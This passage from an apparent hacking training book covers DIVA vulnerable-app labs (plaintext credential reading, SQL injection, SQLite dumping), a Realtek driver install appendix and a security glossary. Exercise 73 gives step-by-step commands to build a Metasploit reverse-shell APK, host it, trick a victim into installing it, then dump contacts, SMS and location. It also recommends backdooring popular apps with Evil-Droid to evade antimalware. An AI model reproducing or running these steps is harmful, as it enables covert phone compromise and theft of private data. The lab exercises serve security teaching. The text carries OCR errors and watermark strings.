insecure and vulnerable App) is an android App intentionally designed to be
insecure. The aim of the App is to teach developers/QA/security
professionals, flaws that are generally present in the Apps due poor or
insecure coding practices.

1. From PC download DIVA from the following Link

2. http://www.payatu.com/wp-content/uploads/2016/01/diva-
beta.tar.gz
3. Unzip the file to the same ADB folder

4. Start Android Virtual device from Android Studio

S_E_Oblako

5. Make sure the diva-beta.apk file is extracted successfully

6. Install the Diva-beta.apk file >./adb install diva-beta.apk

S_E_Oblako

7. In the Android Virtual device start Diva

Exercise 70: Getting Mobile App username and password

Mobile applications store data related to the app inside the Mobile phone in a
folder, if the Mobile app store data in clear text we can read the data via adb
tool or any other android malware. In this exercise we going to check the
DIVA mobile app to see the user credential because this app store data in
clear test.
S_E_Oblako

1. In Virtual Android Phone start Diva App

2. From PC Pwershell start ./adb shell to have a shell access from the
Virtual phone
3. Make sure that you have root access #whoami
4. If you don’t have root access type #exit
5. Type ./adb root to have root access then ./adb shell to go back to
the device shell

6. Type cd /data/data (to show all mobile apps data files)

S_E_Oblako

7. The Mobile app we are testing is Diva , so we can see a folder

called jakhar.aseem.diva
8. Type #cd jakhar.aseem.diva
9. Type #ls -l
10. Type cd shared_prefs/
11. Type #cat jakhar.aseem.diva_perferences.xml

12. Reading the xml file show the username and password used by the
application to access application resources.
13. We can use these credentials to access the account from another
device and see and change the information related to that user.
S_E_Oblako

Exercise 71: Mobile App SQL injection

Mobile application store Mobile application data either in the device itself or
in a server. Offline apps store all the data on the mobile device whereas
Online apps depend on access to a server for their stored data to function. For
example, E-commerce apps fall into the online apps category.
In this exercise we are going to use DIVA app SQL vulnerability to show the
Mobile user data.

1. Start Android Studio then start Virtual Phone

2. Start adb
S_E_Oblako

3. Start DIVA app on the virtual phone

S_E_Oblako

4. In PC adb terminal type >./adb logcat ( this will provide us with

Realtime logging of all devices activity)

5. In the virtual phone DIVA app enter a single quotation symbol in

the search bar and click search
S_E_Oblako

6. In adb terminal hit Crtl + C to stop the logging

7. Look at the SQLitelog error log ‘ ‘ ‘ in SELECT * FROM sqluser
WHERE user = ‘ ‘ ‘

8. The logcat shows SQL query that run by the application to search
for the user “ ‘ “ a select query to find a user “ ‘ “
9. Start the dba logging again >./dba logcat
10. In the virtual phone DIVA app search enter ‘or 1=1; and click
search
S_E_Oblako

11. The app will show a pop screen that shoes users name and
passwords plus credit card number of all users.

Exercise 72: Reading SQLite database in Android Phone

1. Continue from the previous exercise and start adb shell to get a
shell from the virtual phone >./adb shell
2. Type # cd /data/data

3. type #ls

4. Go to jakhar.aseem.diva which is the folder that contain the data of

the DIVA mobile applications
5. #cd jakhar.aseem.diva
6. #ls
7. # cd database
8. #ls to see the content of the database folder
S_E_Oblako

9. #sqlite3 sqli to get sql command

10. Sqlite> .tables ( to see the tables of the database
11. Sqlite> select * from sqliuser; ( to read the content of the sqliuser
table)

12. As you can see the content of the sqli user table is all the
application users and their password and credit card numbers.

Exercise 73: Hacking Real Android phone

In this exercise we are going to hack a real android phone using a malicious
APK file that we are going to create using Metasploit. the APK file will
create a backdoor in the Android phone. In this exercise I am going to use
Samsung galaxy S8+ with the latest software release from Samsung and a
cloud-based server to access the phone.
Note
You can easily get a free cloud server from Amazon, Google Cloud or
Microsoft Azure, you just need to register with one of the providers
mentioned and create your own server. Installing Kali Linux in Google Cloud
server is a bit complicated so instead I used Google provided Ubuntu
Image.Both Kali and Ubuntu are Debian based Linux distribution, the only
difference is that in Ubuntu you will need to install penetration testing tools
manually, part of this exercise procedure is installing Metasploit in Ubuntu
The exercise steps are:
S_E_Oblako

1. Create APK file using Metasploit inside the cloud server (Kali
Linux or Ubuntu Server – I am using Google Cloud, so it was much
easier for me to install Ubuntu Server)
2. Put the APK file inside a web server (the same Cloud server).
3. Convince the victim through social Engineering or other means to
download the APK file in his phone and enable the feature of
running APK from external resource)
4. Listen to connection from the phone using Metasploit in the Cloud
server.
5. Controlling the phone, getting phone location, images, videos, and
messages

6. Depending on the Could provider you use start the Cloud server.
(Installing and running of a cloud server is outside the scope of this
book, however it is very easy and there are a lot of help resources
provided by service providers and others in the internet)
7. I am using Google cloud console.

8. Note that the server has internal IP address when it is not running
but when it is started, it will take external IP address that we are
going to use in the APK file.
9. If you want a permanent external IP address, then you must pay 3
to 4 dollars a month for the external IP address.

10. You will need to have SSH and RDP software installed in your
S_E_Oblako

Windows to connect to the cloud server.

11. I am using putty software to get fast access to the cloud server shell
and RDP to have a desktop from the G-cloud server.
12. Start putty and connect to the G-cloud server.
13. Use Putty public key authentication for secure access to the server.

14. Update the server

#sudo apt-get update

#sudo apt-get upgrade

15. If you are running Ubuntu, you will need to install Metasploit
console

#sudo ap-get install Metasploit

16. Create the APK file

#sudo msfvenom -p android/meterpreter/reverse_tcp LHOST= <the

S_E_Oblako

external IP address > LPORT=4444 or any free port R>malicious.apk

17. Move the malicious.apk file to web server

#sudo mv malicious.apk /var/www/html

18. Check the webserver is running #sudo systemctl status apache2

19. If not active start it #sudo service apache2 start

20. Set up Metasploit to listen to incoming connections in port 4444

21. #sudo msfconsole
S_E_Oblako

22. Configure msfconsole

Msf6> use exploit/multi/handler

>set payload android/meterpreter/reverse_tcp
>set LHOST<external IP address of G-Cloud>
>set LPORT < same port used in creating the APK file>
>exploit

23. From the Android phone open Web browser and enter the external
IP address of your cloud server
24. Follow the instructions to download and install the APK file into
the phone ( see screenshot below
25. You need to have install apk from external sources enabled in your
S_E_Oblako

android phone
S_E_Oblako

26. When Apk file installation is done successfully you will have a
meterpreter session on the server (see below screenshot)
S_E_Oblako

27. Type sysinfo to see android OS info

28. Type help to see available android specific commands

29. To check if the phone rooted or not, type >check_root

S_E_Oblako

30. To know the phone location, type >geolocate

You can take the latitude and longitude numbers and input them in Google
Maps to see the phone location on the map

31. to dump all phone contact to a file in the server, type

>dump_contacts

32. To dump all sms from the phone to the server, type >dump_sms
S_E_Oblako
S_E_Oblako
S_E_Oblako

Note
The APK file generated by msfvenom is not a reliable APK file and
sometimes it does not work, and android antimalware program can detect it
very easily and stop it from working. There are many available tools in
Github that generate more efficient and evasive APK files that can pass
android antimalware programs.
The most popular APK generating tools is Evil-Droid
(https://github.com/M4sc3r4n0/Evil-Droid).
Evil-Droid can also inject another APK file with backdoor APK file. Yu can
download any well-known APK file for a game or app from third party APK
stores and then use Evil-Droid to inject backdoor APK file. Anyone runs the
injected APK file will connect back to the attacker server. The process of
injecting the backdoor is done automatically in a step by step GUI that guide
through the whole process.
S_E_Oblako

17. Appendix 1: Realtek Driver update

This procedure to install driver for wireless USB adapters that has Realtek
chipset RTL8812AU or RTL8811AC

1. Kali 2020.1 running Kernal 5.4 have a major problem with many
USB Wi-Fi adapters that used to run with prior Kali Versions ( Kali
19.4 and down)
2. Check the version of usb Wi-Fi adapter you have with command

#lausb

3. Check Kali version

4. Install Linux headers in Kali Linux

#ap-get update && apt-get upgrade

#apt-get install linux-headers-$(uname -r)

5. Install driver source code

S_E_Oblako

#git clone https://github.com/aircrack-ng/rtl8812au

6. Install DKMS

DKMS ( Dynamic Kernel Module Support) is a tool for automatically

compiling and installing kernel modules and managing drivers that access
kernel directly
#apt-get install dkms

7. To install the rtl8812au driver

#cd rtl8812au
#./dkms-install.sh
#dkms status

8. Disconnect wifi adapter

9. Rebook Kali
10. Connect wifi adapter
11. Check the wifi adaptor is running in Kali
S_E_Oblako

18. Appendix2: Glossary

Acronym Stands for Definition
A cyber-attack that continuously
Advanced Persistent
APT uses advanced techniques to
Threat
conduct cyber espionage or crime
An international consortium that
brings together businesses affected
Anti-Phishing Working by phishing attacks with security
APWG
Group companies, law enforcement,
government, trade associations, and
others.
A computer program used to
AV Antivirus prevent, detect, and remove
malware.
A group of Antivirus and security
Anti-Virus Information specialists who share information
AVIEN
Exchange Network regarding AV companies, products,
malware and other threats.
Completely Automated A response test used in computing,
Public Turing Test to especially on websites, to confirm
CAPTCHA
Tell Computers and that a user is human instead of a
Humans Apart bot.
Computer Antivirus An organization established in 1990
CARO
Research Organization to study malware.
This program provides validation
testing of FIPS-approved and NIST-
recommended cryptographic
Cryptographic
algorithms and individual
CAVP Algorithm Validation
components. Cryptographic
Program
algorithm validation is necessary
precursor to cryptographic module
validation.
Operation for a block cipher using
an initialization vector and a
chaining mechanism. This will
CBC Cipher Block Chaining
S_E_Oblako

cause the decryption of a block

of cipher text to depend on
preceding cipher text blocks.
This constructs a message
authentication code from a block
cipher. The message is encrypted
Cipher Block Chaining
CBC- with some block cipher algorithm
Message
MAC in CBC mode. This creates a chain
Authentication Code
of blocks with each block
depending on the correct encryption
of the previous block.
Center for Education
A part of Purdue University
and Research in
CERIAS dedicated to research and education
Information Assurance
in information security.
and Security
In this case, an expert group that
Computer Emergency
CERT handles computer security incidents
Response Team
and alerts organizations about them.
A protocol for authentication that
provides protection against replay
Challenge-Handshake
CHAP attacks through the use of a
Authentication Protocol
changing identifier and a variable
challenge-value.
A group that handles events
Computer Incident
CIRT involving computer security and
Response Team
data breaches.
A 501 nonprofit organization with a
mission to "Identify, develop,
validate, promote, and sustain best
Center for Internet
CIS practice solutions for cyber defense
Security
and build and lead communities to
enable an environment of trust in
cyberspace."
Professionals who monitor, audit,
CISA Certified Information control, and assess information
Systems Auditor systems.
S_E_Oblako

A certification offered by ISACA

which "Demonstrates your
Certified Information
understanding of the relationship
CISM Systems Security
between an information security
Manager
program and broader business goals
and objectives."
The CISO is the executive
responsible for an organization's
information and data security.
Increasingly, this person aligns
security goals with business
Chief Information
CISO enablement or digital
Security Officer
transformation. CISOs are also
increasingly in a "coaching role"
helping the business manage cyber
risk. This is according to Ponemon
Institute research.
The CISSP is a security certification
for security analysts, offered by
Certified Information
ISC(2). It was designed to indicate a
CISSP Systems Security
person has learned certain
Professional
standardized knowledge in
cybersecurity.
A U.S. plan to enhance
cybersecurity awareness and
Cybersecurity National
CNAP protections, protect privacy,
Action Plan
maintain public safety, and
economic and national security.
A U.S. government initiative
designed to establish a front line of
Comprehensive defense against network intrusion,
CNCI National Cybersecurity defend the U.S. against the threats
Initiative through counterintelligence, and
strengthen the
cybersecurity environment.
CND is defined by the U.S. military
S_E_Oblako

as defined by the US Department of

Defense (DoD) as, "Actions taken
through the use of computer
Computer Network networks to protect, monitor,
CND
Defense analyze, detect, and respond to
unauthorized activity within
Department of Defense information
systems and computer networks."
This style of defense applies to the
private sector as well.
Control Objectives for An IT management including
COBIT Information and practices, tools and models for risk
Related Technologies management and compliance.
The CSEC, also known as the
CEC, partners with educators and
the broader cybersecurity
Cyber Security
CSEC community to ensure students are
Education Consortium
prepared to lead and be
changemakers in the cybersecurity
workforce.
The Cloud Security Alliance is the
world's leading organization for
Cloud Security defining best practices in cloud
CSA
Alliance cybersecurity. It also provides a
cloud security provider certification
program, among other things.
In some cases, the Chief Security
Officer is in charge of an
organization's entire security
posture or strategy. This includes
CSO Chief Security Officer
both physical security and
cybersecurity. In other cases, this
title belongs to the senior most role
in charge of cybersecurity.
The CSSIA is a U.S. leader in
training cybersecurity educators. It
Center for Systems
S_E_Oblako

CSSIA Security and provides these teachers and

Information Assurance professors with real-world learning
experiences in information
assurance and network security.
CVE® is a list of entries—each
containing an identification number,
a description, and at least one public
reference—for publicly known
Common
cybersecurity vulnerabilities. CVE
CVE Vulnerabilities and
Entries are used in numerous
Exposures
cybersecurity products and services
from around the world, including
the U.S. National Vulnerability
Database (NVD).
An industry standard for rating the
severity of security vulnerabilities.
Common Vulnerability CVSS attempts to assign severity
CVSS
Scoring System scores to vulnerabilities, allowing
responders to prioritize responses
and resources according to threat.
A distributed denial-of-service
(DDoS) attack attempts to disrupt
normal traffic of a targeted server,
Distributed Denial of service or network to make a
DDoS
Service service such as a website unusable
by “flooding” it with malicious
traffic or data from multiple sources
(often botnets).
An information security strategy to
protect corporate data. DLP is a set
of tools and processes used to
DLP Data Loss Prevention ensure that sensitive data is not lost,
misused, or accessed by
unauthorized users, either inside or
outside of an organization.
DNS uses the name of a website to
S_E_Oblako

redirect traffic to its owned IP

address. Amazon.com should take
you to Amazon's website, for
example. During this type of attack,
DNS
Domain Name Server which is complex and appears in
attack
several ways, cybercriminals can
redirect you to another site for their
own purposes. This attack takes
advantage of the communication
back and forth between clients and
servers.
Endpoint Detection & Response
solutions are designed to detect and
respond to endpoint anomalies.
EDR solutions are not designed to
Endpoint Detection & replace IDPS solutions or firewalls
EDR
Response but extend their functionality by
providing in-depth endpoint
visibility and analysis. EDR uses
different datasets, which facilitates
advanced correlations and detection.
FISMA is United States legislation
which requires each federal agency
to develop, document, and
implement an agency-wide program
Federal Information
to provide information security for
FISMA Security Management
its information systems and data.
Act
The act recognized the importance
of information security to the
economic and national security
interests of the United States.
Laws that assigns responsibilities
within the U.S. federal government
for setting and complying with
Federal Information policies to secure agencies'
FISMA Security Modernization information systems. For example,
Department of Homeland Security
S_E_Oblako

Act (2014) administers cybersecurity policies

and the Office of Management and
Budget provides oversight.

An organization run by and for

information systems security
Federal Information professionals to assist federal
FISSEA Systems Security agencies in meeting their
Educators' Association information systems security
awareness, training, and education
responsibilities.
Three parts of a strategy for
managing an organization's overall
Governance, Risk governance, enterprise risk
GRC Management, and management and compliance with
Compliance regulations. Cybersecurity people,
practices and tools play a key part
in GRC for many organizations.
An extension of the Hypertext
Transfer Protocol. It is used for
secure communication over a
computer network by encrypting the
Secure Hypertext information you send from your
HTTPS
Transfer Protocol computer to another website, for
example. It is a means of ensuring
privacy, security and also a way of
authenticating that the site you’re
on is the one you intended to visit.
Measures that protect and defend
information and information
systems by ensuring their
IA Information Assurance availability, integrity,
authentication, confidentiality, and
non-repudiation.
IAM is a framework of policies and
technologies for ensuring that the
S_E_Oblako

proper people in an enterprise have

the appropriate access to technology
Identity and access resources. This helps organizations
IAM
management maintain “least privileged” or "zero
trust" account access, where
employees only have access to the
minimum amount of data needed
for their roles.
A type of public-key encryption in
which the public key of a user is
Identity-Based
IBE some unique information about the
Encryption
identity of the user, like a user's
email address, for example.
Intrusion Detection Systems (IDS)
analyze network traffic for
signatures that match known
Intrusion
cyberattacks. Intrusion Prevention
Detection/Intrusion
IDS/IDP Systems (IPS) analyze packets as
Detection and
well, but can also stop the packet
Prevention
from being delivered based on what
kind of attacks it detects, helping to
stop the attack.
ISACA provides certifications for
IT security, audit and risk
management professionals. ISACA
also maintains the COBIT
framework for IT management and
governance. ISACA was
Information Systems incorporated in 1969 by a small
ISACA Audit and Control group of individuals who
Association recognized a need for a centralized
source of information and guidance
in the growing field of auditing
controls for computer systems.
Today, ISACA serves professionals
in 180 countries.
S_E_Oblako

A protocol for establishing Security

Internet Security Associations and cryptographic
ISAKMP Association and Key keys in an Internet environment.
Management Protocol ISAKMP only provides a
framework for authentication and
key exchange and is designed to be
key exchange independent.
The ISAP is a U.S. government
agency initiative to enable
Information Security automation and standardization of
ISAP
Automation Program technical security operations. Its
standards based design may benefit
those in the private sector as well.
A non-profit organization which
International
specializes in training and
Information Systems
(ISC)² certification for cybersecurity
Security Certification
professionals. Certifications include
Consortium
the CISSP.
An organization that develops
international standards of many
International
types, including two major
ISO Organization for
information security management
Standardization
standards, ISO 27001 and ISO
27002.
ISSA is a not-for-profit,
Information Systems international organization of
ISSA
Security Association information security professionals
and practitioners.
Individual with assigned
Information Systems responsibility for maintaining the
ISSO Security Officer appropriate operational security
posture for an information system
or program.
The ISSPM, sometimes called an IT
Security Manager, coordinates and
executes security policies and
S_E_Oblako

Information Systems controls, as well as assesses

ISSPM
Security Program vulnerabilities within a company.
Manager They are often responsible for data
and network security processing,
security systems management, and
security violation investigation.
To use Java security to protect a
Java application from performing
potentially unsafe actions, you can
enable a security manager for the
JVM in which the application runs.
JSM Java Security Manager
The security manager enforces a
security policy, which is a set of
permissions (system access
privileges) that are assigned to code
sources.
The mission of the MS-ISAC is to
improve the overall cybersecurity
Multi-State Information posture of the nation's state, local,
MS-ISAC Sharing and Analysis tribal and territorial governments
Center through focused cyber threat
prevention, protection, response,
and recovery.
Provides outsourced monitoring and
management of security devices and
systems. Common services include
Managed Security
MSSP managed firewall, intrusion
Services Provider
detection, virtual private network,
vulnerability scanning and anti-viral
services.
A school within the National
Security Agency. The NCS
provides the NSA workforce and its
Intelligence Community and
National Cryptologic Department of Defense partners
NCS highly-specialized cryptologic
School
training, as well as courses in
S_E_Oblako

leadership, professional
development, and over 40 foreign
languages.
A non-profit working with
the Department of Homeland
Security, private sector sponsors,
National Cyber and nonprofit collaborators to
NCSA
Security Alliance promote cyber security awareness
for home users, small and medium
size businesses, and primary and
secondary education.
NCSAM is a collaborative effort
between government and industry
to raise awareness about the
importance of cybersecurity and to
ensure that all Americans have the
resources they need to be safer and
National Cyber
more secure online. It occurs each
NCSAM Security Awareness
year in October. The security
Month
awareness month started with a
joint effort by the National Cyber
Security Division within the
Department of Homeland Security
and the nonprofit National Cyber
Security Alliance.
A division of the Office of Cyber
Security & Communications with
the mission of collaborating with
the private sector, government,
military, and intelligence
National Cyber stakeholders to conduct risk
NCSD Security Division assessments and mitigate
vulnerabilities and threats to
information technology assets and
activities affecting the operation of
the civilian government and private
sector critical cyber infrastructures.
S_E_Oblako

An online resource for

cybersecurity training that connects
National Initiative for
government employees, students,
NICCS Cybersecurity Careers
educators, and industry with
and Studies
cybersecurity training providers
throughout the United States.
The mission of NICE is to energize
National Initiative for and promote a robust network and
NICE Cybersecurity an ecosystem of cybersecurity
Education education, training, and workforce
development.
The National Industrial Security
Program Operating Manual
establishes the standard procedures
National Industrial and requirements for all
NISPOM Security Program government contractors, with
Operating Manual regards to classified information. It
covers the entire field of
government-industrial security
related matters.
In cybersecurity circles, NIST is
extremely well known for the NIST
Cybersecurity Framework, as well
the NIST Risk Management
Framework (RMF), NIST 800-53
control guidance, NIST Digital
Identity Guidelinesand others. The
National Institute of overall NIST mission is to "promote
NIST Standards and U.S. innovation and industrial
Technology competitiveness by advancing
measurement science, standards,
and technology in ways that
enhance economic security and
improve our quality of life." NIST
is part of the U.S. Department of
Commerce.
S_E_Oblako

OPSEC is a term derived from the

U.S. military and is an analytical
process used to deny an adversary
information that could compromise
OPSEC Operational Security the secrecy and/or the operational
security of a mission.Performing
OPSEC related techniques can play
a significant role in both offensive
and defensive cybersecurity
strategies.
OSINT is information drawn from
publicly available data that is
collected, exploited, and reported to
address a specific intelligence
Open Source
OSINT requirement. In the intelligence
Intelligence
community, the term "open" refers
to overt, publicly available sources
(as opposed to covert or clandestine
sources).
The Payment Card Industry Data
Security Standard (PCI-DSS) is a
set of security standards designed to
Payment Card Industry
PCI-DSS ensure that all companies that
Data Security Standard
accept, process, store or transmit
credit card information maintain a
secure environment.
System Administration, A private company that specializes
SANS Networking, and in information security training and
Security Institute security certification.
Security Information and Event
Management (SIEM) technology
supports threat detection and
Security Information security incident response through
SIEM the real-time collection and
and Event Management
historical analysis of security events
from a wide variety of event and
contextual sources.
S_E_Oblako

A central location or team within an

Security Operations organization that is responsible for
SOC
Center monitoring, assessing and
defending security issues.
A system which enables users to
securely authenticate themselves
SSO Single Sign-On with multiple applications and
websites by logging in with a single
set of credentials.
The behavior of an actor. A tactic is
the highest-level description of this
behavior, while techniques give a
Tactics, Techniques, more detailed description of
TTP
and Procedures behavior in the context of a tactic,
and procedures an even lower-level,
highly detailed description in the
context of a technique.
UBA tracks a system's users,
looking for unusual patterns of
behavior. In cybersecurity, the
process helps detect insider threats,
and other targeted attacks including
financial fraud. User behavior
UBA / User Behavior analytics solutions look at patterns
UEBA Analytics of human behavior, and then apply
algorithms and statistical analysis to
detect meaningful anomalies from
those patterns. This guides efforts to
correct unintentional behavior that
puts business at risk and risky and
intentional deceit.
By connecting through a VPN, all
the data you send and receive
travels through an encrypted
"tunnel" so that no one can see what
Virtual Private you are transmitting or decipher it if
S_E_Oblako

VPN Network they do get a hold of it. VPNs also

allow you to hide your physical
location and IP address, often
displaying the IP address of the
VPN service, instead.